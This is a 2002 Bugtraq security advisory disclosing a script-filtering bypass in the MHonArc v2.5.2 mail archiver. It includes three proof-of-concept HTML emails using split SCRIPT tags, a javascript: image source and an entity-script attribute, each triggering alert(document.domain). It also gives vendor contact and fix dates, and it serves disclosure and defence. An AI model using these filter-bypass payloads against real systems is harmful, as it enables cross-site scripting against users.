[25164] in bugtraq
MHonArc v2.5.2 Script Filtering Bypass Vulnerability
daemon@ATHENA.MIT.EDU (TAKAGI, Hiromitsu)
Thu Apr 18 23:32:14 2002
Date: Fri, 19 Apr 2002 06:53:54 +0900
From: "TAKAGI, Hiromitsu" <takagi.hiromitsu@aist.go.jp>
To: bugtraq@securityfocus.com
Message-Id: <20020419055744.61A4.TAKAGI.HIROMITSU@aist.go.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
MHonArc v2.5.2 Script Filtering Bypass Vulnerability
====================================================
Affected:
---------
MHonArc v2.5.2
http://www.mhonarc.org/
Fixed:
------
MHonArc v2.5.3
http://www.mhonarc.org/MHonArc/CHANGES
Problem:
--------
MHonArc has a feature which filters out scripting tags from incoming
HTML mails and it is enabled on default. However, some variations
of scripting tags will not be filtered.
Exploit 1:
----------
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
</HTML>
----------
Exploit 2:
----------
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<IMG SRC=javascript:alert(document.domain)>
</HTML>
----------
Exploit 3:
----------
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<B foo=&{alert(document.domain)};>
Vulnerable only if Netscape 4.x is used to browse.</B>
</HTML>
----------
Vendor Status:
--------------
The author was contacted on December 16, 2001.
The fixed version was released on April 18, 2002.
Best regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://staff.aist.go.jp/takagi.hiromitsu/
